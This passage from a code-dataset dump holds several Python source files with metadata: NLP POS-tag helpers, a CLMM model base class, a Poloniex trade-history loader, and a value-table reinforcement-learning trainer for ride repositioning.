358, "usage_type": "call"}, {"api_name": "json.dumps", "line_number": 376, "usage_type": "call"}, {"api_name": 
"hamcrest.assert_that", "line_number": 380, "usage_type": "call"}, {"api_name": "hamcrest.equal_to", "line_number": 380, "usage_type": "call"}, {"api_name": "hamcrest.assert_that", "line_number": 381, "usage_type": "call"}, {"api_name": "stagecraft.apps.dashboards.models.dashboard.Dashboard.objects.count", "line_number": 381, "usage_type": "call"}, {"api_name": "stagecraft.apps.dashboards.models.dashboard.Dashboard.objects", "line_number": 381, "usage_type": "attribute"}, {"api_name": "stagecraft.apps.dashboards.models.dashboard.Dashboard", "line_number": 381, "usage_type": "name"}, {"api_name": "hamcrest.equal_to", "line_number": 381, "usage_type": "call"}, {"api_name": "stagecraft.libs.authorization.tests.test_http.with_govuk_signon", "line_number": 370, "usage_type": "call"}, {"api_name": "json.dumps", "line_number": 389, "usage_type": "call"}, {"api_name": "hamcrest.assert_that", "line_number": 393, "usage_type": "call"}, {"api_name": "hamcrest.equal_to", "line_number": 393, "usage_type": "call"}, {"api_name": "hamcrest.assert_that", "line_number": 394, "usage_type": "call"}, {"api_name": "stagecraft.apps.dashboards.models.dashboard.Dashboard.objects.count", "line_number": 394, "usage_type": "call"}, {"api_name": "stagecraft.apps.dashboards.models.dashboard.Dashboard.objects", "line_number": 394, "usage_type": "attribute"}, {"api_name": "stagecraft.apps.dashboards.models.dashboard.Dashboard", "line_number": 394, "usage_type": "name"}, {"api_name": "hamcrest.equal_to", "line_number": 394, "usage_type": "call"}, {"api_name": "stagecraft.libs.authorization.tests.test_http.with_govuk_signon", "line_number": 383, "usage_type": "call"}, {"api_name": "json.dumps", "line_number": 401, "usage_type": "call"}, {"api_name": "stagecraft.apps.dashboards.models.dashboard.Dashboard.objects.first", "line_number": 405, "usage_type": "call"}, {"api_name": "stagecraft.apps.dashboards.models.dashboard.Dashboard.objects", "line_number": 405, "usage_type": "attribute"}, {"api_name": "stagecraft.apps.dashboards.models.dashboard.Dashboard", "line_number": 405, "usage_type": "name"}, {"api_name": "hamcrest.assert_that", "line_number": 407, "usage_type": "call"}, {"api_name": "hamcrest.equal_to", "line_number": 407, "usage_type": "call"}, {"api_name": "hamcrest.assert_that", "line_number": 408, "usage_type": "call"}, {"api_name": "hamcrest.equal_to", "line_number": 408, "usage_type": "call"}, {"api_name": "hamcrest.assert_that", "line_number": 409, "usage_type": "call"}, {"api_name": "hamcrest.contains", "line_number": 410, "usage_type": "call"}, {"api_name": "hamcrest.has_property", "line_number": 410, "usage_type": "call"}, {"api_name": "hamcrest.equal_to", "line_number": 411, "usage_type": "call"}, {"api_name": "stagecraft.libs.authorization.tests.test_http.with_govuk_signon", "line_number": 396, "usage_type": "call"}, {"api_name": "stagecraft.apps.dashboards.tests.factories.factories.ModuleTypeFactory", "line_number": 415, "usage_type": "call"}, {"api_name": "stagecraft.libs.views.utils.to_json", "line_number": 436, "usage_type": "call"}, {"api_name": "hamcrest.assert_that", "line_number": 440, "usage_type": "call"}, {"api_name": "hamcrest.equal_to", "line_number": 440, "usage_type": "call"}, {"api_name": "stagecraft.apps.dashboards.models.dashboard.Dashboard.objects.first", "line_number": 441, "usage_type": "call"}, {"api_name": "stagecraft.apps.dashboards.models.dashboard.Dashboard.objects", "line_number": 441, "usage_type": "attribute"}, {"api_name": 
"stagecraft.apps.dashboards.models.dashboard.Dashboard", "line_number": 441, "usage_type": "name"}, {"api_name": "hamcrest.assert_that", "line_number": 442, "usage_type": "call"}, {"api_name": "hamcrest.equal_to", "line_number": 442, "usage_type": "call"}, {"api_name": "stagecraft.libs.authorization.tests.test_http.with_govuk_signon", "line_number": 413, "usage_type": "call"}, {"api_name": "stagecraft.apps.dashboards.tests.factories.factories.ModuleTypeFactory", "line_number": 446, "usage_type": "call"}, {"api_name": "stagecraft.libs.views.utils.to_json", "line_number": 460, "usage_type": "call"}, {"api_name": "hamcrest.assert_that", "line_number": 464, "usage_type": "call"}, {"api_name": "hamcrest.equal_to", "line_number": 464, "usage_type": "call"}, {"api_name": "stagecraft.libs.authorization.tests.test_http.with_govuk_signon", "line_number": 444, "usage_type": "call"}, {"api_name": "stagecraft.apps.dashboards.tests.factories.factories.ModuleTypeFactory", "line_number": 468, "usage_type": "call"}, {"api_name": "stagecraft.libs.views.utils.to_json", "line_number": 482, "usage_type": "call"}, {"api_name": "hamcrest.assert_that", "line_number": 486, "usage_type": "call"}, {"api_name": "hamcrest.equal_to", "line_number": 486, "usage_type": "call"}, {"api_name": "hamcrest.assert_that", "line_number": 487, "usage_type": "call"}, {"api_name": "stagecraft.apps.dashboards.models.dashboard.Dashboard.objects.count", "line_number": 487, "usage_type": "call"}, {"api_name": "stagecraft.apps.dashboards.models.dashboard.Dashboard.objects", "line_number": 487, "usage_type": "attribute"}, {"api_name": "stagecraft.apps.dashboards.models.dashboard.Dashboard", "line_number": 487, "usage_type": "name"}, {"api_name": "hamcrest.equal_to", "line_number": 487, "usage_type": "call"}, {"api_name": "stagecraft.libs.authorization.tests.test_http.with_govuk_signon", "line_number": 466, "usage_type": "call"}, {"api_name": "json.dumps", "line_number": 494, "usage_type": "call"}, {"api_name": "json.dumps", "line_number": 499, "usage_type": "call"}, {"api_name": "hamcrest.assert_that", "line_number": 503, "usage_type": "call"}, {"api_name": "hamcrest.equal_to", "line_number": 503, "usage_type": "call"}, {"api_name": "hamcrest.assert_that", "line_number": 504, "usage_type": "call"}, {"api_name": "hamcrest.equal_to", "line_number": 504, "usage_type": "call"}, {"api_name": "hamcrest.assert_that", "line_number": 505, "usage_type": "call"}, {"api_name": "stagecraft.apps.dashboards.models.dashboard.Dashboard.objects.count", "line_number": 505, "usage_type": "call"}, {"api_name": "stagecraft.apps.dashboards.models.dashboard.Dashboard.objects", "line_number": 505, "usage_type": "attribute"}, {"api_name": "stagecraft.apps.dashboards.models.dashboard.Dashboard", "line_number": 505, "usage_type": "name"}, {"api_name": "hamcrest.equal_to", "line_number": 505, "usage_type": "call"}, {"api_name": "stagecraft.libs.authorization.tests.test_http.with_govuk_signon", "line_number": 489, "usage_type": "call"}, {"api_name": "json.dumps", "line_number": 516, "usage_type": "call"}, {"api_name": "json.loads", "line_number": 519, "usage_type": "call"}, {"api_name": "hamcrest.assert_that", "line_number": 522, "usage_type": "call"}, {"api_name": "hamcrest.equal_to", "line_number": 522, "usage_type": "call"}, {"api_name": "hamcrest.assert_that", "line_number": 523, "usage_type": "call"}, {"api_name": "hamcrest.equal_to", "line_number": 523, "usage_type": "call"}, {"api_name": "hamcrest.assert_that", "line_number": 524, "usage_type": "call"}, 
{"api_name": "hamcrest.equal_to", "line_number": 525, "usage_type": "call"}, {"api_name": "stagecraft.libs.authorization.tests.test_http.with_govuk_signon", "line_number": 507, "usage_type": "call"}]} +{"seq_id": "124140215", "text": "## English Command\n#java -mx4g -cp \"*\" edu.stanford.nlp.pipeline.StanfordCoreNLPServer -annotators \"tokenize,ssplit,pos,lemma,parse,sentiment\" -port 9000 -timeout 30000\n\n## Arabic Command\n#java -Xmx4g -cp \"*\" edu.stanford.nlp.pipeline.StanfordCoreNLPServer \\\n# -serverProperties StanfordCoreNLP-arabic.properties \\\n# -preload tokenize,ssplit,pos,parse \\\n# -status_port 9005 -port 9005 -timeout 15000\n\nfrom collections import Counter\n\nADJ=[\"JJ\",\"JJR\",\"JJS\"]\nADV=[\"RB\" ,\"RBR\" ,\"RBS\",\"RP\",\"WRB\"]\nVB=[\"MD\",\"VB\",\"VBD\",\"VBG\",\"VBN\",\"VBP\",\"VBZ\"]\nNN=[\"NN\",\"NNS\",\"NNP\",\"NNPS\"]\nPRN=[\"DT\" ,\"EX\", \"PDT\" ,\"PRP\",\"PRP$\",\"WDT\",\"WP\",\"WP$\"]\nOTHR=[\"CD\" ,\"LS\",\"POS\",\"SYM\",\"TO\" , \"UH\", \"INF\" , \"FW\"]\nPUNCT=[\".\", \",\",\":\",\"(\",\")\"]\nCLAUSE=[\"SBAR\",\"SBARQ\",\"SINV\",\"SQ\"]\n\n\ndef getType(tag):\n if tag in ADJ: return \"ADJ\"\n elif tag in ADV: return \"ADV\"\n elif tag in VB: return \"VB\"\n elif tag in NN: return \"NN\"\n elif tag in PRN: return \"PRN\"\n elif tag in OTHR: return \"OTHR\"\n elif tag in PUNCT: return \"PUNCT\"\n else : return tag\n\n\ndef isClause(tag):\n if tag in CLAUSE:\n return True\n return False\n\n\n##Other\n## CD - Cardinal Number\n##LS - List Item Marker\n##POS - Possessive Ending\n## SYM - Symbol\n##UH -Interjection\n##TO - infinitive to\n## Pronouns\n##DT -Determiner\n##EX -Existential There\n##PDT -Predeterminer (Both)\n##PRP -Pronoun , Personal\n##PRP$ -Pronoun , Possessive\n##WDT -WH Determiner\n##WP -WH Personal Pronoun\n##WP$ -WH possessive Pronoun\n## Verb Tags\n# MD - VERB, modal Auxiliary\n# VB - Verb, base form\n# VBD - Verb, past tense\n# VBG - Verb, gerund or present participle\n# VBN - Verb, past participle\n# VBP - Verb, non-3rd person singular present\n# VBZ - Verb, 3rd person singular present\n##Nouns\n##NN Noun , singular or mass\n##NNS Noun , plural\n##NNP Noun , proper singular\n##NNPS Noun , Proper Plural\n##Conjunctions\n# CC -Coordinating Conjunction\n## Preposition\n##IN - Subordinating Conjunction / Preposition\n## Adjectives\n# JJ - Adjective\n# JJR - Adjective, comparative\n# JJS - Adjective, superlative\n## Adverb\n# RB -Adverb\n# RBR -Comparative Adverb\n# RBS -Superlative adverb\n# RP - Particle Adverb\n# WRB - Wh- adverb\n\n\n\n\n\n\n\n\ndef defaultArabicPennTags():\n PennTags=Counter({'CC':0 , 'CD':0 , 'DT':0 , 'EX':0 , \"FW\":0 , \"IN\":0 , \"JJ\":0 , \"JJR\":0 , \"JJS\":0 , \"LS\":0,\n \"MD\":0 , \"NN\":0 ,\"NNS\":0 ,\"NNP\":0 , \"NNPS\":0 , \"PDT\":0 , \"POS\":0,\"PRP\":0 , \"PRP$\":0 ,\n \"RB\":0 , \"RBR\":0 , \"RBS\":0 , \"RP\":0 , \"SYM\":0 , \"TO\":0 , \"UH\":0 , \"VB\":0 ,\"VBD\":0 ,\n \"VBG\":0 , \"VBN\":0 , \"VBP\":0 , \"VBZ\":0 , \"WDT\":0 , \"WP\":0 , \"WP$\":0 , \"WRB\":0 , \"JJR\":0 ,\"ADJ_NUM\":0,\n \"VN\":0 , \"NN\":0 ,\"DTJJ\":0 ,\"DTNNPS\":0 , \"DTNNP\":0 , \"DTNNS\":0 , \"DTNN\":0 , \"NOUN_QUANT\":0 , \"DTNOUN_QUANT\":0 , \"DTJJR\":0 , \"PUNC\":0\n })\n return PennTags\n", "sub_path": "complexity/wiki_model/helpers.py", "file_name": "helpers.py", "file_ext": "py", "file_size_in_byte": 2824, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "collections.Counter", "line_number": 91, "usage_type": "call"}]} +{"seq_id": "538817879", "text": 
"\"\"\"Model class\"\"\"\nimport numpy as np\nimport six\nimport clmm\nfrom clmm.core import CLMMBase\n\n\nclass Model(CLMMBase):\n \"\"\"A generalized superclass of what a model is. A model has parameters\n and a functional form. The parameters may vary or be fixed.\n\n Attributes\n ----------\n func : callable\n functional form of the model, should be wrapped by the class\n\n independent_vars : array-like of str, optional\n arguments to func that are independent variables (default to None)\n\n params : dict of floats, optional\n Dictionary of parameters\n\n \"\"\"\n\n\n def __init__(self, func=None, independent_vars=None, params=None):\n \"\"\"\n Parameters\n ----------\n func : callable, optional\n functional form of the model, should be wrapped by the class\n\n independent_vars : array-like of str, optional\n arguments to func that are independent variables (default to None)\n\n params : dict of floats, optional\n Dictionary of parameters\n\n \"\"\"\n\n if callable(func) or func is None:\n self.func = func\n else:\n raise TypeError('func should be a callable')\n\n if (np.iterable(independent_vars) and not isinstance(independent_vars, dict)\n and all(isinstance(var, str) for var in independent_vars)\n and not isinstance(independent_vars, six.string_types)) \\\n or (independent_vars is None):\n self.independent_vars = independent_vars\n else:\n raise TypeError('independent_vars should be a list of str or None')\n\n\n if isinstance(params, dict) or params is None:\n self.params = params\n else:\n raise TypeError('params should be a dictionary')\n", "sub_path": "clmm/models/model.py", "file_name": "model.py", "file_ext": "py", "file_size_in_byte": 1779, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "clmm.core.CLMMBase", "line_number": 8, "usage_type": "name"}, {"api_name": "numpy.iterable", "line_number": 46, "usage_type": "call"}, {"api_name": "six.string_types", "line_number": 48, "usage_type": "attribute"}]} +{"seq_id": "67179338", "text": "from poloniex.app import SyncApp\nimport argparse\nfrom exchangeapi.interface.model import TradeSocket,db_session\nfrom datetime import datetime,timedelta\nfrom sqlalchemy import func\nfrom exchangeapi.interface.trade import Trade\n\ndef get_dates(start,end=datetime.today()+timedelta(days=1)):\n date_list = []\n while start < end:\n date_list.append(start)\n start = start+timedelta(days=1)\n return date_list\n\ndef load_results_tradesocket(results,pair):\n print(\"Results to upload:\" + str(len(results)))\n i = 1\n for result in results:\n print(\"submitting row \" + str(i) + \" \" + str(result[\"globalTradeID\"]) )\n print(\"date\"+result[\"date\"])\n i+=1\n trade = Trade(\n \"t\",\n result['tradeID'],\n result['date'],\n pair,\n result['type'],\n result['rate'],\n result['amount'],\n )\n trade.commit()\n\n\ndef get_results(app,pair,start_datetime_obj,end_datetime_obj):\n return app.public.returnTradeHistory(currency_pair=pair,\n start=start_datetime_obj,\n end=end_datetime_obj)\n\ndef load_paged(app,pair,entry,end=None):\n continue_paging=True\n end_datetime_obj=None\n if end is None:\n end_datetime_obj = entry+timedelta(days=1)-timedelta(seconds=1)\n else:\n end_datetime_obj=end\n while continue_paging==True:\n results = app.public.returnTradeHistory(currency_pair=pair,\n start=entry,\n end=end_datetime_obj)\n if len(results) > 0:\n load_results_tradesocket(results,pair)\n\n # check for paging results\n if len(results) == 50000:\n print(\"len hit 50000\")\n 
continue_paging=True\n entry=datetime.strptime(results[-1][\"date\"],'%Y-%m-%d %H:%M:%S')+timedelta(seconds=1)\n print(\"new start:\"+ str(entry))\n else:\n #done\n continue_paging=False\n\ndef parse_startend(args):\n app = SyncApp(api_key=args.api_key,\n api_sec=args.api_secret)\n\n pair = args.pair\n\n start_datetime_obj = datetime.strptime(args.start,\"%Y-%m-%d %H:%M:%S\")\n end_datetime_obj = datetime.strptime(args.end,\"%Y-%m-%d %H:%M:%S\")\n dates = get_dates(start_datetime_obj,end_datetime_obj)\n dates.append(end_datetime_obj)\n if not args.start:\n raise RuntimeError(\"missing arg start_date\")\n #db_session.query(RestTrade).delete()\n #db_session.commit()\n index_count = len(dates)\n i = 1\n for entry in dates:\n print(\"starting date: \" + str(entry))\n if i==index_count:\n load_paged(app,pair,entry,end_datetime_obj)\n else:\n load_paged(app,pair,entry)\n\ndef parse_hist(args):\n app = SyncApp(api_key=args.api_key,\n api_sec=args.api_secret)\n\n pair = args.pair\n\n start_datetime_obj = datetime.strptime(args.start,\"%Y-%m-%d\")\n dates = get_dates(start_datetime_obj)\n\n if not args.start:\n raise RuntimeError(\"missing arg start_date\")\n #db_session.query(RestTrade).delete()\n #db_session.commit()\n for entry in dates:\n print(\"starting date: \" + str(entry))\n load_paged(app,pair,entry)\n\ndef parse_current(args):\n app = SyncApp(api_key=args.api_key,\n api_sec=args.api_secret)\n\n pair = args.pair\n start_date = db_session.query(func.max(TradeSocket.timestamp)).one()[0] + timedelta(seconds=1)\n dates = get_dates(start_date)\n for entry in dates:\n print(\"starting datetime: \" + str(entry))\n load_paged(app,pair,entry)\n\n\ndef main():\n parser = argparse.ArgumentParser()\n subparser= parser.add_subparsers(help=\"subcommand help\")\n parser.add_argument(\"--api_key\",help=\"api key\", required=True)\n parser.add_argument(\"--api_secret\",help=\"api secret\", required=True)\n parser.add_argument(\"--pair\",help=\"pair slug\", required=True)\n parser_hist = subparser.add_parser(\"hist\",help=\"run hist\")\n parser_hist.add_argument(\"--start\",help=\"start yyyy-mm-dd\")\n parser_hist.set_defaults(func=parse_hist)\n parser_current = subparser.add_parser(\"current\", help=\"run current\")\n parser_current.set_defaults(func=parse_current)\n parser_startend = subparser.add_parser(\"startend\", help=\"run start end\")\n parser_startend.add_argument(\"--start\",help=\"start yyyy-mm-dd hh:mm:ss\")\n parser_startend.add_argument(\"--end\",help=\"start yyyy-mm-dd hh:mm:ss\")\n parser_startend.set_defaults(func=parse_startend)\n\n args = parser.parse_args()\n args.func(args)\n\n\nif __name__== \"__main__\":\n #todo(aj) arg for key and sec\n #todo(aj) arg for currency pairs\n main()\n", "sub_path": "exchangeapi/poloprocess_historical.py", "file_name": "poloprocess_historical.py", "file_ext": "py", "file_size_in_byte": 4686, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "datetime.datetime.today", "line_number": 8, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 8, "usage_type": "name"}, {"api_name": "datetime.timedelta", "line_number": 8, "usage_type": "call"}, {"api_name": "datetime.timedelta", "line_number": 12, "usage_type": "call"}, {"api_name": "exchangeapi.interface.trade.Trade", "line_number": 22, "usage_type": "call"}, {"api_name": "datetime.timedelta", "line_number": 43, "usage_type": "call"}, {"api_name": "datetime.datetime.strptime", "line_number": 57, "usage_type": "call"}, 
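One subtlety in `get_dates` at the top of this record: the default `end=datetime.today()+timedelta(days=1)` is evaluated once, at import time, so a long-running process keeps comparing against a stale cutoff. A late-binding sketch with the same interface:

```python
from datetime import datetime, timedelta

def get_dates(start, end=None):
    # Compute the default at call time instead of at import time.
    if end is None:
        end = datetime.today() + timedelta(days=1)
    date_list = []
    while start < end:
        date_list.append(start)
        start = start + timedelta(days=1)
    return date_list
```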
{"api_name": "datetime.datetime", "line_number": 57, "usage_type": "name"}, {"api_name": "datetime.timedelta", "line_number": 57, "usage_type": "call"}, {"api_name": "poloniex.app.SyncApp", "line_number": 64, "usage_type": "call"}, {"api_name": "datetime.datetime.strptime", "line_number": 69, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 69, "usage_type": "name"}, {"api_name": "datetime.datetime.strptime", "line_number": 70, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 70, "usage_type": "name"}, {"api_name": "poloniex.app.SyncApp", "line_number": 87, "usage_type": "call"}, {"api_name": "datetime.datetime.strptime", "line_number": 92, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 92, "usage_type": "name"}, {"api_name": "poloniex.app.SyncApp", "line_number": 104, "usage_type": "call"}, {"api_name": "exchangeapi.interface.model.db_session.query", "line_number": 108, "usage_type": "call"}, {"api_name": "exchangeapi.interface.model.db_session", "line_number": 108, "usage_type": "name"}, {"api_name": "sqlalchemy.func.max", "line_number": 108, "usage_type": "call"}, {"api_name": "sqlalchemy.func", "line_number": 108, "usage_type": "name"}, {"api_name": "exchangeapi.interface.model.TradeSocket.timestamp", "line_number": 108, "usage_type": "attribute"}, {"api_name": "exchangeapi.interface.model.TradeSocket", "line_number": 108, "usage_type": "name"}, {"api_name": "datetime.timedelta", "line_number": 108, "usage_type": "call"}, {"api_name": "argparse.ArgumentParser", "line_number": 116, "usage_type": "call"}]} +{"seq_id": "140506414", "text": "import torch\r\nimport numpy as np\r\nimport time\r\nimport os\r\nimport pandas as pd\r\nimport pickle\r\n\r\ndef read_file(*filenames):\r\n '''\r\n Load the data file and return a big numpy array that contains all information except order ID\r\n :param filenames: the tuple in which the name strings of the files are\r\n :return all_data_array: a numpy array\r\n '''\r\n if os.path.exists(\"all_data_array.npy\"):\r\n return np.load(\"all_data_array.npy\")\r\n all_data_array = np.zeros([0, 7])\r\n for filename in filenames:\r\n print('reading file:', filename)\r\n file = open(filename)\r\n data = file.readlines()\r\n data_list = []\r\n for line in data:\r\n tmp = line.split(',')\r\n for i in range(1, 8):\r\n tmp[i] = eval(tmp[i])\r\n data_list.append(tmp)\r\n file.close()\r\n data_array = np.zeros([len(data_list), 7])\r\n for i in range(len(data_list)):\r\n data_array[i, :] = np.array(data_list[i][1:8])\r\n all_data_array = np.concatenate([all_data_array, data_array])\r\n np.save(\"all_data_array.npy\", all_data_array)\r\n return all_data_array\r\n\r\ndef decode_state(state):\r\n '''\r\n Decode the input state to the network\r\n :param state: an n*3 numpy array, 3 columns are timestamp, longtitude, latitude respectively\r\n :return new_state: an n*4 numpy array, the first two columns are day_of_week and the number of 10-minute that have passed\r\n '''\r\n date = np.zeros([state.shape[0], 1])\r\n t = np.zeros([state.shape[0], 1])\r\n for i in range(state.shape[0]):\r\n tmp = time.gmtime(state[i, 0])\r\n date[i, 0] = tmp[6]\r\n t[i, 0] = tmp[3]*6+tmp[4]/10\r\n date = np.array(date)\r\n t = np.array(t)\r\n new_state = np.concatenate([date, t, state[:, 1:3]], axis=1)\r\n return new_state\r\n\r\n\r\n# The class used to discretize the map into square grids and storage the time table at the square grids\r\nclass loc_table(object):\r\n def __init__(self, load_file=None):\r\n self.grids = 
pd.read_csv('hexagon_grid_table.csv',\r\n names=['grid_id', 'lng1', 'lat1', 'lng2', 'lat2', 'lng3', 'lat3', 'lng4', 'lat4',\r\n 'lng5', 'lat5', 'lng6', 'lat6'])\r\n self.grids['lng'] = (self.grids['lng1'] + self.grids['lng2'] + self.grids['lng3'] + self.grids['lng4'] +\r\n self.grids['lng5'] + self.grids['lng6']) / 6\r\n self.grids['lat'] = (self.grids['lat1'] + self.grids['lat2'] + self.grids['lat3'] + self.grids['lat4'] +\r\n self.grids['lat5'] + self.grids['lat6']) / 6\r\n self.grids = self.grids.drop(4183)\r\n self.row_num, self.col_num = 100, 100\r\n self.date_num, self.time_num = 7, int(86400/(10*60))\r\n self.max_lng = 104.3\r\n self.min_lng = 103.7\r\n self.max_lat = 30.9\r\n self.min_lat = 30.4\r\n self.step_size_lng = (self.max_lng - self.min_lng) / self.col_num\r\n self.step_size_lat = (self.max_lat - self.min_lat) / self.row_num\r\n self.grid_table = pd.DataFrame(data=None, index=range(self.row_num), columns=range(self.col_num))\r\n self.table_table = [[None for i in range(self.col_num)] for j in range(self.row_num)] \r\n\r\n self.create_grid_table()\r\n self.create_table_table()\r\n\r\n if load_file is not None:\r\n self.load_table_table(load_file)\r\n\r\n def create_grid_table(self):\r\n '''\r\n Create a table that contains the grid IDs in square grids\r\n :return grid_table: a pd dataframe\r\n '''\r\n for k in range(self.grids.shape[0]):\r\n for l in range(1, 7):\r\n x, y = self.look_up(self.grids.iloc[k, 2 * l - 1], self.grids.iloc[k, 2 * l])\r\n if x is None:\r\n continue\r\n if type(self.grid_table.loc[x, y]) is float:\r\n self.grid_table.loc[x, y] = [self.grids.iloc[k, 0]]\r\n else:\r\n self.grid_table.loc[x, y].append(self.grids.iloc[k, 0])\r\n self.grid_table.to_csv('grid_table.csv', encoding='gbk')\r\n return self.grid_table\r\n\r\n def create_table_table(self):\r\n '''\r\n Create a table that contains the time table (from date&time to value) in square grids\r\n :return NN_table: a second order list\r\n '''\r\n for i in range(self.row_num):\r\n for j in range(self.col_num):\r\n self.table_table[i][j] = [[0.0 for i in range(self.time_num)] for j in range(self.date_num)]\r\n return self.table_table\r\n\r\n def look_up(self, lng, lat):\r\n '''\r\n Given the longitude and the latitude of a location, return the index of the location in the square grid table\r\n :param lng, lat: two float\r\n :return xlabel, ylabel: two int\r\n '''\r\n if lng <= self.min_lng or lng >= self.max_lng or lat <= self.min_lat or lat >= self.max_lat:\r\n return None, None\r\n xlabel = int((lng - self.min_lng) / self.step_size_lng)\r\n ylabel = int((lat - self.min_lat) / self.step_size_lat)\r\n if xlabel == self.col_num:\r\n xlabel -= 1\r\n if ylabel == self.row_num:\r\n ylabel -= 1\r\n return xlabel, ylabel\r\n\r\n def storage_table_table(self):\r\n f = open('table_table.pkl', 'wb')\r\n pickle.dump(self.table_table, f, -1)\r\n f.close()\r\n\r\n def load_table_table(self, filename):\r\n f = open(filename, 'rb')\r\n self.table_table = pickle.load(f)\r\n f.close()\r\n\r\n def look_up_value(self, lng, lat, timestamp):\r\n '''\r\n Return the values of the given state\r\n :param lng, lat, timestamp: three scalar\r\n :return value: an n-dim list\r\n '''\r\n state = np.array([[timestamp, lng, lat]])\r\n state = decode_state(state)\r\n date, t, lng, lat = state[0]\r\n x, y = self.look_up(lng, lat)\r\n if x is None:\r\n return 0\r\n value = self.table_table[int(x)][int(y)][int(date)][int(t)]\r\n\r\n return value\r\n\r\n\r\n\r\n# The training agent\r\nclass Agent(object):\r\n def __init__(\r\n self,\r\n 
gamma=0.9,\r\n batch_size=20000\r\n ):\r\n self.batch_size = batch_size\r\n self.gamma = gamma\r\n self.table = loc_table()\r\n self.criterion = torch.nn.MSELoss()\r\n\r\n def discount_reward(self, reward, dt):\r\n '''\r\n Modify the reward using the method from the paper\r\n :param reward: original reward\r\n :param dt: order duraction (second)\r\n :return modified_reward: reward after modified\r\n '''\r\n time_slot = 10*60 # 10 minutes\r\n num_slot = dt / time_slot # could be a float\r\n reward_per_slot = reward / num_slot\r\n modified_reward = reward_per_slot * (1 - self.gamma**num_slot) / (1 - self.gamma)\r\n\r\n return modified_reward\r\n\r\n def update_param(self, batch):\r\n '''\r\n Use a batch data to take one update of NN parameters\r\n :param batch: a numpy array with shape batch_size*7 (remove order ID)\r\n :return:\r\n '''\r\n this_state = decode_state(batch[:, [0, 2, 3]])\r\n next_state = decode_state(batch[:, [1, 4, 5]])\r\n dt = batch[:, 1] - batch[:, 0] # unit: second\r\n time_slot = 10 * 60 # 10 minutes\r\n num_slot = dt / time_slot\r\n reward = batch[:, 6]\r\n reward = self.discount_reward(reward, dt)\r\n for i in range(batch.shape[0]):\r\n this_x, this_y = self.table.look_up(this_state[i, 2], this_state[i, 3])\r\n next_x, next_y = self.table.look_up(next_state[i, 2], next_state[i, 3])\r\n this_date, this_time = int(this_state[i, 0]), int(this_state[i, 1])\r\n # print('this_date:', this_date, 'this_time:', this_time)\r\n next_date, next_time = int(next_state[i, 0]), int(next_state[i, 1])\r\n if this_x is None or next_x is None:\r\n continue\r\n predict_value = self.table.table_table[this_x][this_y][this_date][this_time]\r\n self.table.table_table[this_x][this_y][this_date][this_time] = reward[i] + self.gamma ** num_slot[i] * self.table.table_table[next_x][next_y][next_date][next_time]\r\n after_predict_value = self.table.table_table[this_x][this_y][this_date][this_time]\r\n MSE = self.criterion(torch.tensor(predict_value), torch.tensor(after_predict_value))\r\n print('MSE between updation:', MSE.item(), 'Value sample:', predict_value)\r\n # convergence_flag = (MSE < 1e-3)\r\n convergence_flag = False\r\n return convergence_flag\r\n\r\n def train(self, *filename):\r\n data_array = read_file(*filename)\r\n max_iteration = 15000\r\n for iter in range(max_iteration):\r\n print('iter:', iter)\r\n sample_index = np.random.choice(data_array.shape[0], self.batch_size, replace=False)\r\n batch = data_array[sample_index]\r\n convergence_flag = self.update_param(batch)\r\n if convergence_flag:\r\n break\r\n if iter % 300 == 0:\r\n self.table.storage_table_table()\r\n\r\n\r\nif __name__ == '__main__':\r\n Dummy_Agent = Agent()\r\n filepath = os.path.dirname(__file__) + '/data4/total_ride_request'\r\n file_list = os.listdir(filepath)\r\n file_list = file_list[1:]\r\n for i in range(len(file_list)):\r\n file_list[i] = filepath + '/' + file_list[i]\r\n Dummy_Agent.train(*file_list)\r\n", "sub_path": "model/reposition/train_pure_value_table.py", "file_name": "train_pure_value_table.py", "file_ext": "py", "file_size_in_byte": 9463, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "os.path.exists", "line_number": 14, "usage_type": "call"}, {"api_name": "os.path", "line_number": 14, "usage_type": "attribute"}, {"api_name": "numpy.load", "line_number": 15, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 16, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 28, "usage_type": "call"}, 
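`discount_reward` in this record spreads an order's reward evenly across its 10-minute slots and then applies the closed form of the geometric series, modified = (reward/n) * (1 - gamma^n)/(1 - gamma), which for integer n equals the slot-by-slot discounted sum. A quick numeric check of that identity:

```python
gamma = 0.9
reward, dt = 10.0, 30 * 60        # 10 units over a 30-minute order
num_slot = dt / (10 * 60)         # 3.0 ten-minute slots
per_slot = reward / num_slot      # ~3.33 per slot

closed_form = per_slot * (1 - gamma ** num_slot) / (1 - gamma)
series = sum(per_slot * gamma ** k for k in range(int(num_slot)))

assert abs(closed_form - series) < 1e-9
print(closed_form)  # ~9.033: below the raw 10.0 because later slots decay
```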
{"api_name": "numpy.array", "line_number": 30, "usage_type": "call"}, {"api_name": "numpy.concatenate", "line_number": 31, "usage_type": "call"}, {"api_name": "numpy.save", "line_number": 32, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 41, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 42, "usage_type": "call"}, {"api_name": "time.gmtime", "line_number": 44, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 47, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 48, "usage_type": "call"}, {"api_name": "numpy.concatenate", "line_number": 49, "usage_type": "call"}, {"api_name": "pandas.read_csv", "line_number": 56, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 72, "usage_type": "call"}, {"api_name": "pickle.dump", "line_number": 126, "usage_type": "call"}, {"api_name": "pickle.load", "line_number": 131, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 140, "usage_type": "call"}, {"api_name": "torch.nn.MSELoss", "line_number": 162, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 162, "usage_type": "attribute"}, {"api_name": "torch.tensor", "line_number": 202, "usage_type": "call"}, {"api_name": "numpy.random.choice", "line_number": 213, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 213, "usage_type": 